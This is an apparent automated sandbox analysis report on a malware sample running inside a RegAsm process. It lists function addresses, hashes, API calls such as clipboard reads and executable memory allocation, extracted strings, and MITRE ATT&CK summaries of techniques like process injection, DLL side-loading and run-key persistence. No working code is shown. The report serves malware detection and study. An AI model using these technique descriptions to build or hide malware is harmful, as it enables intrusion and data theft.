Instruction ID: d8ac3ec1662ce7fc204c67f60de0c5ebde28b7fe9e327e361a7d478e3e6a78fd
Opcode Fuzzy Hash: 8e1a4ce2a09d512d88441af55b70a62b48b6dae6c781d40d5880f1a539daa340
Instruction Fuzzy Hash: 5F21AEB4509301ABD704CF10E9A072BBBF1EBCAB09F14892DE49917252D738D945DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00423105 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 446COMMON

Download Yara Rule

Strings

-7.4, xrefs: 004239DA
MR R, xrefs: 00423852

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -7.4$MR R
API String ID: 0-942721988
Opcode ID: a2553a3257c9e09cdaacefa5ee88dd7e452b3dcb077e2faff38b9d95aea45a84
Instruction ID: 492bbf8a237798f33d5a261da23dae48e0fbb4a352f940bd821eaad0080f4603
Opcode Fuzzy Hash: a2553a3257c9e09cdaacefa5ee88dd7e452b3dcb077e2faff38b9d95aea45a84
Instruction Fuzzy Hash: 98F139B0204B928AE725CF35D0647E7BBE1BF16309F44896DC0EB8B282DB7D6549CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00423596 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 380COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004236FE

Strings

-7.4, xrefs: 004239DA
MR R, xrefs: 00423852

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: -7.4$MR R
API String ID: 3960555810-942721988
Opcode ID: 763129677535d4a72a604066d148867399aeb3608e40668b7624e40a6f656fa5
Instruction ID: 2fa671b28a049078f4dd0d03d5744d44717cea9c832a25525f32d7520d8a97d6
Opcode Fuzzy Hash: 763129677535d4a72a604066d148867399aeb3608e40668b7624e40a6f656fa5
Instruction Fuzzy Hash: 43E14AB0204B528AE725CF35D4647E7BBE1BF16309F44896DC0EB8B382DB7D65098B54

Uniqueness

Uniqueness Score: -1.00%

Function 004341A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 0043433E

Strings

>=, xrefs: 004342BB
G1F7, xrefs: 004342A3

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: >=$G1F7
API String ID: 1029625771-3563142761
Opcode ID: d282417f180fcb37d25bbaa060342a80c76658950f6c0418d30f9346f6b724dd
Instruction ID: 14da80cf22acf3b89c99242e8ca6be0b19683f6df11c328d6f7ee38423698bc4
Opcode Fuzzy Hash: d282417f180fcb37d25bbaa060342a80c76658950f6c0418d30f9346f6b724dd
Instruction Fuzzy Hash: A54108742083419BD718CF00D99475FBBE1BFC9B58F148A1CE8955B381D378D90A9B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004090B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00409134

Strings

How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety., xrefs: 004090F3

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety.
API String ID: 621844428-3219661580
Opcode ID: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
Instruction ID: 1624d7f5e89d02a9961bc28c365e007a4165c690b29712144a0b90f16931b4fd
Opcode Fuzzy Hash: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
Instruction Fuzzy Hash: 5501F970A0C202E6D6103B76590F27A7A98AE51358F10053FE9827A2D3E67C4C1793AF

Uniqueness

Uniqueness Score: -1.00%

Function 004306D2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00430707

Strings

\, xrefs: 004306D2

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: InformationVolume
String ID: \
API String ID: 2039140958-2967466578
Opcode ID: 85cd59c97f6bf9b5c0b9df7c107cb441f9e4dbc72515e3f52d986a405ecfa20c
Instruction ID: 669ce7c395f7719595b6c1e41dfd85534ccdbd0b1e6287d7c188649188475883
Opcode Fuzzy Hash: 85cd59c97f6bf9b5c0b9df7c107cb441f9e4dbc72515e3f52d986a405ecfa20c
Instruction Fuzzy Hash: 8AE0D8B4780701BFE328CF10EC17F1A32A59B56708F21842DB352E51D0D7B0B5158E4D

Uniqueness

Uniqueness Score: -1.00%

Function 00434EAA Relevance: 1.6, APIs: 1, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 00434F42

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8766dd349803b0aadd33b5bff09709d5c2c416b32e9d35dc4ba9c8f4b06ff8cd
Instruction ID: 9080a20ae45bcd27f959725e669f5616208f8f1387f58d0cde705380d5325144
Opcode Fuzzy Hash: 8766dd349803b0aadd33b5bff09709d5c2c416b32e9d35dc4ba9c8f4b06ff8cd
Instruction Fuzzy Hash: 39315A352047408FD708CB19D8A175AB7E7FBCA308F59592DE896C7391DB74D8058B85

Uniqueness

Uniqueness Score: -1.00%

Function 0043578A Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 004357BD

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: af2343f50029ef6560b681cc73a43abc56670331be55fb578e0e1ec371587131
Instruction ID: 504582ca42c7631d75393fb3ebdbe1de8a90d190ed4849b8966b2e04a4dd38ed
Opcode Fuzzy Hash: af2343f50029ef6560b681cc73a43abc56670331be55fb578e0e1ec371587131
Instruction Fuzzy Hash: 4F21F774608780DFD348CF19D49471BB7E6FB8A318F502A1DF49587392C335D8458B8A

Uniqueness

Uniqueness Score: -1.00%

Function 00432120 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00409CBA), ref: 004321B4

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d458b643132478d644b961611ba8fef4bf81086d996713c2458425bbb86b2864
Instruction ID: 92c4e559d7fdf9a385e00d3618763a18d143ea68be6cee5cca90d72daa594498
Opcode Fuzzy Hash: d458b643132478d644b961611ba8fef4bf81086d996713c2458425bbb86b2864
Instruction Fuzzy Hash: CA011370108381AFE304CF14D5A472BBBE1EBC5328F208A0DE8A907791C779D909CBCA

Uniqueness

Uniqueness Score: -1.00%

Function 00432220 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 004322AD

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 11dc267cecbb66a9f442fa07742978905afb724dec188e6b4b9367b2927edd7b
Instruction ID: 690fc5bc2595e82f503e5c74ecb3b1a2912e957d418eaafec1a9f36fab02054a
Opcode Fuzzy Hash: 11dc267cecbb66a9f442fa07742978905afb724dec188e6b4b9367b2927edd7b
Instruction Fuzzy Hash: 4E111C755026419FD7258F18C994B46BB62EB85328F34CA9EC4691B696C376E407CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00435AE5 Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 00435AF3

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8d0c6da2411a7cb7b8c2da46d3b71a69a4c51ae348ecbca2b3e79ce87589a106
Instruction ID: 4966d1c77637cc2c4b68332eedbb01f38c9df5c10605bfeb59e33d42c67c15c2
Opcode Fuzzy Hash: 8d0c6da2411a7cb7b8c2da46d3b71a69a4c51ae348ecbca2b3e79ce87589a106
Instruction Fuzzy Hash: 56C01275600105AFDA108F40EC45A9AB725F785211F100575F50482454D330A8A6CAE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00432DA0 Relevance: 9.4, APIs: 6, Instructions: 402nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00100000,00003000,00000004), ref: 00432DF7
NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000000,00003000,00000040), ref: 00432F00
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00432F5C
NtFreeVirtualMemory.NTDLL(000000FF,00100000,000000B8,00008000), ref: 00432FB0
NtAllocateVirtualMemory.NTDLL(000000FF,00100000,00000000,?,00003000,00000004), ref: 00432FD7
NtFreeVirtualMemory.NTDLL(000000FF,00100000,?,00008000), ref: 004332F8

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 5f8e4073aeb01aa4ac56c9b6e609d705606626a17ef78959440afe6f213bec6a
Instruction ID: 6901e04b5bfed640b9808015ee33ac261d83c230db4e7679f3eb9058c464b57b
Opcode Fuzzy Hash: 5f8e4073aeb01aa4ac56c9b6e609d705606626a17ef78959440afe6f213bec6a
Instruction Fuzzy Hash: 40E178711083419FD714CF18C880B2BBBE1BB89318F148A2EF5A487391D779E909CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00437D70 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 334nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00437E1C
NtFreeVirtualMemory.NTDLL(000000FF,00000000,?,00008000), ref: 00437E7A
NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00437F3B
NtFreeVirtualMemory.NTDLL(000000FF,000000B8,?,00008000), ref: 00437F98

Strings

R-,T, xrefs: 00437EC0

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: R-,T
API String ID: 292159236-635581381
Opcode ID: ed90575c12bcf7de9af35658b07ad19d7a2236ed8284722c33d4dd63a188024f
Instruction ID: 3dd0099d7a10fb4040d1ab2e05897a9660030bd435626c55e0cd4113b078addf
Opcode Fuzzy Hash: ed90575c12bcf7de9af35658b07ad19d7a2236ed8284722c33d4dd63a188024f
Instruction Fuzzy Hash: F8C1BF716083119FC714CF18C880A1BF7E1EF98318F198A2DF9959B3A1DB78D905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA3C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041BADE
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041BB39
NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041BD7E
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041BDD9

Strings

01, xrefs: 0041BEED

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: 01
API String ID: 292159236-3477152822
Opcode ID: fed2dc28b6cbed2a1ab562f7af2b107bbc30e3a60bc6d271f81b13037ac1232c
Instruction ID: 664c0559d8076d972d5a56e374875a1de3e0a82fa573013157e44d364f674d6d
Opcode Fuzzy Hash: fed2dc28b6cbed2a1ab562f7af2b107bbc30e3a60bc6d271f81b13037ac1232c
Instruction Fuzzy Hash: 3BD123B01083829FD724CF04C894B9FBBE1FB85348F148D2DE5E98B391D77999498B96

Uniqueness

Uniqueness Score: -1.00%

Function 004379E0 Relevance: 6.3, APIs: 4, Instructions: 290nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00437A88
NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00437AE5
NtAllocateVirtualMemory.NTDLL(000000FF,900000C2,00000000,?,00003000,00000040), ref: 00437BA6
NtFreeVirtualMemory.NTDLL(000000FF,900000C2,00000010,00008000), ref: 00437BFF

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: e88d8017e8f8bb3a12f26d533c2ab0e88090f966b0ae722f833f28f72e89afaf
Instruction ID: cd35143630c2b7208a231692c9bfede39d70e314533d5fdb885180932d4d8fe2
Opcode Fuzzy Hash: e88d8017e8f8bb3a12f26d533c2ab0e88090f966b0ae722f833f28f72e89afaf
Instruction Fuzzy Hash: A3B159B52083059FD720CF18C880B2BB7E5FF89754F148A2DE9959B3A0D778E905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00432600 Relevance: 6.2, APIs: 4, Instructions: 206nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004326A9
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004326F7
NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,0000BA00,00003000,00000040), ref: 0043282F
NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 0043287D

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 258604b8d0d172c35addf8d08e83f0e2d700bd3f6966df86fd9f836becff31e5
Instruction ID: b7602bd55606e6d13354845806596aa518dbb84f2c3c29a10939dc9f0e37411e
Opcode Fuzzy Hash: 258604b8d0d172c35addf8d08e83f0e2d700bd3f6966df86fd9f836becff31e5
Instruction Fuzzy Hash: 558178756083009FE304DF18C944B1BBBE5FB89728F144A2DE5A49B3D1D7B5D809CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004180C5 Relevance: 6.1, APIs: 4, Instructions: 138nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041824F
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00418296

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
Instruction ID: ea426b73a6193aca508bd4f71ddd3128639f88ab0726b32ca3609f59bda8a89b
Opcode Fuzzy Hash: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
Instruction Fuzzy Hash: 155155B51087059FE704CF04C844B5FB7E4FB89708F144A2DF9A99B2A0DB78D9498B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B230 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 209COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041B346
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041B374

Strings

`a, xrefs: 0041B27B

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: `a
API String ID: 237503144-512829590
Opcode ID: f86cb4591fc71e74da725966c1eb0e60b94ca4f5965b5f3c60f3e3b5fd6e9612
Instruction ID: 211465a6f8bb4c712efb5c1327cce063fb9030e645e76492337cb801d03caa5d
Opcode Fuzzy Hash: f86cb4591fc71e74da725966c1eb0e60b94ca4f5965b5f3c60f3e3b5fd6e9612
Instruction Fuzzy Hash: 12719D716083518BE728CF15C8A1B9BB7E2EFC9308F048A1DE8995B381D7B49545CBD7

Uniqueness

Uniqueness Score: -1.00%

Function 0041B6AF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041B82C
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041B884

Strings

NM, xrefs: 0041B92C

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: NM
API String ID: 292159236-659443033
Opcode ID: e61b303816415c7f5f5d92e4ab71877ace8d6bab5c9632d1ce1da36c78d05f1f
Instruction ID: f00f4fd28a0e5576ffbbb8e6303699de98ce98a9013cd7b91c2115223f1c65f0
Opcode Fuzzy Hash: e61b303816415c7f5f5d92e4ab71877ace8d6bab5c9632d1ce1da36c78d05f1f
Instruction Fuzzy Hash: 4F5120B01083809FD320CF04C894B9BBBE5FB85748F104A2DE5E59B391D7B89949CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00437420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004374D4
NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00437533

Strings

$, xrefs: 004374AB

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: $
API String ID: 292159236-3993045852
Opcode ID: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
Instruction ID: 412d602cbfcbcf5e118d5b7ea9dfba44e96f25c8408074ac52780fe9017936c2
Opcode Fuzzy Hash: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
Instruction Fuzzy Hash: 9A313275208315AFE710CF14DC84B1BBBE8EB89754F10492DFAA4973D0D775A9088B97

Uniqueness

Uniqueness Score: -1.00%

Function 004203A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 236COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00420473
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 004204A7

Strings

b%K+, xrefs: 004204AD
_-Z3, xrefs: 004204BB
V107, xrefs: 004204C2
_)M/, xrefs: 004204B4

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: V107$_)M/$_-Z3$b%K+
API String ID: 237503144-3840097723
Opcode ID: 415396783fcf33fd62c8bdbf907285ad325f08c277288e8db70e6241533ae13a
Instruction ID: 7466cd2c268fc972bfc07d1a477bb0991477af1b0ae2b0464136dea7a275457c
Opcode Fuzzy Hash: 415396783fcf33fd62c8bdbf907285ad325f08c277288e8db70e6241533ae13a
Instruction Fuzzy Hash: C5A10571240F148BD326CF24C6A4B97BBE1FF49714F904A1DD6AB4BA91D774B406CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0042AFE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042AFFD
GetClipboardData.USER32 ref: 0042B01E
GlobalLock.KERNEL32 ref: 0042B03D
GlobalUnlock.KERNEL32 ref: 0042B155
CloseClipboard.USER32 ref: 0042B168

Strings

, xrefs: 0042B0BF

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-3916222277
Opcode ID: cea0a327820102340c8f955b3794ac00dd49388d72f97b56df99a0b6a7389256
Instruction ID: f4c19b65ddc9955578d64893f0c40d4310a5dafcf5dcc80618631c40f4c3c9e8
Opcode Fuzzy Hash: cea0a327820102340c8f955b3794ac00dd49388d72f97b56df99a0b6a7389256
Instruction Fuzzy Hash: E1416C7150C391CBC3119B28948866FBFE0EB963A4F840A5EF8E157292C3389959CBD7

Uniqueness

Uniqueness Score: -1.00%

Function 0041BFE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041C108
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041C139

Strings

M3, xrefs: 0041C14C

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: M3
API String ID: 237503144-1098715678
Opcode ID: 64ea4e8046676ed8e9fc3ac0e64fc677348dbb62c249d565b03b54e58056c842
Instruction ID: 11f51877d1175f535d645effb319d41d797b5f81760811a065eadd595d4e7ea0
Opcode Fuzzy Hash: 64ea4e8046676ed8e9fc3ac0e64fc677348dbb62c249d565b03b54e58056c842
Instruction Fuzzy Hash: 1551A8B15007009FD724CF29C884B62BBB5EF89314F158A9CE8A68F7A6D734E845CB85

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
